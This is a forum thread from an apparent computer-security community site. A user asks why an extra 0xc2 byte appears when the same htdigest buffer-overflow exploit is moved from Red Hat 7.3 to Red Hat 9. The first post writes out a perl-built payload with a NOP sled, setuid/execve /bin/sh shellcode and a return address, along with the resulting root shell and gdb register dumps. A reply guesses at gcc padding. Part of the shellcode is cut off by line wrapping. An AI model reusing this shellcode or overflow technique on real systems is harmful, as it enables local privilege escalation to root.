Where's my extra byte coming from? - HeapOverflow Computer Security Community & Forums : Heap Overflow.com

HeapOverflow Computer Security Community & Forums : Heap Overflow.com

		HeapOverflow Computer Security Community & Forums : Heap Overflow.com > Computer Security: Discussions > Hacking
Where's my extra byte coming from?

Mark Forums Read

Notices

Welcome to you visitor! This community is mainly dedicated to the computer and security, if you're looking for DFind scanner or others exploits codes you will find them into the Projects section, feel free to start Blogging and remember to always keep an eye and start talking about security Advisories & public Exploits.

Hacking Discuss the art of hacking, your experiences, etc...

Where's my extra byte coming from?

This is a discussion on "Where's my extra byte coming from?" within the Hacking part of the Computer Security: Discussions section; I've been working on an exploit it works great on RH7.3 [root@localhost root]# htdigest -c file `perl -e 'print "\x90"x343 . "\x31\xdb\x31\xc0\xb0\x17\xcd\x80\xeb\x16\x5b\x31\ xc0\...

Reply

#1 (permalink)

Old

28-10-05

h3llfyr3 is offline

Junior Member

Join Date: Sep 2005

Posts: 19

Thanks: 0

Thanked 0 Times in 0 Posts

Rep Power: 8

h3llfyr3 is on a distinguished road

Default

Where's my extra byte coming from?

I've been working on an exploit it works great on RH7.3

[root@localhost root]# htdigest -c file `perl -e 'print "\x90"x343 .
"\x31\xdb\x31\xc0\xb0\x17\xcd\x80\xeb\x16\x5b\x31\ xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8 d\$
. "\xaa\xaa\xaa\xaa" . "\xf0\xfa\xff\xbf"'` user
Adding password for user in realm 1Û1À°Íë[1ÀCC
°
S
Íèåÿÿÿ/bin/shªªªªðúÿ¿.
New password:
Re-type new password:
sh-2.05a# exit

but when run on RH9 (same command just trying to overwrite EIP so o know where to go

) . Now I note that it's printing out the char Â not nothing (a nop) and it adds an extra byte into the nopsled and aaaa's
note esi 0xc290c290
and eip 0xc2aac2aa so WTF is c2 coming from??

[root@localhost bin]# ./htdigest -c file ` perl -e 'print "\x90"x195 . "\xaa\xaa\xaa\xaa"'`
user
Adding password for user in realm
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
#0 0xc2aac2aa in ?? ()
(gdb) i r
eax 0x1 1
ecx 0x8050d28 134548776
edx 0x22d9 8921
ebx 0xc290c290 -1030700400
esp 0xbfffe4d0 0xbfffe4d0
ebp 0xc2aac290 0xc2aac290
esi 0xc290c290 -1030700400
edi 0xc290c290 -1030700400
eip 0xc2aac2aa 0xc2aac2aa

Reply With Quote

Sponsor

Advertiser

#2 (permalink)

Old

13-12-05

Guest

Posts: n/a

Default

Adventure

WOW how exciting!

Reply With Quote

#3 (permalink)

Old

11-04-06

0x0804

Guest

Posts: n/a

Default

Which version of gcc are you using. I guess since gcc 2.5 onwards they introduced something called as padding. It makes it harder to get the exploit working. Either you can disable it or I would suggest you try increasingly till you completely overwrite teh eip. I have encountered a padding a more than 64 bytes. It's quite annoying.

Reply With Quote

Sponsor

Advertiser

Reply

Tags
byte, coming, extra, wheres

« backdoor in C language | Disconnecting game servers »

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Posting Rules
You may not post new threads You may not post replies You may not post attachments You may not edit your posts BB code is On Smilies are On [IMG] code is On HTML code is Off Trackbacks are On Pingbacks are On Refbacks are On

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
some functions[C/C++]	fl0 fl0w	Programming	0	27-12-07 12:46

heapoverflow.com - SEOmeter SEO tools

Locations of visitors to this page

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47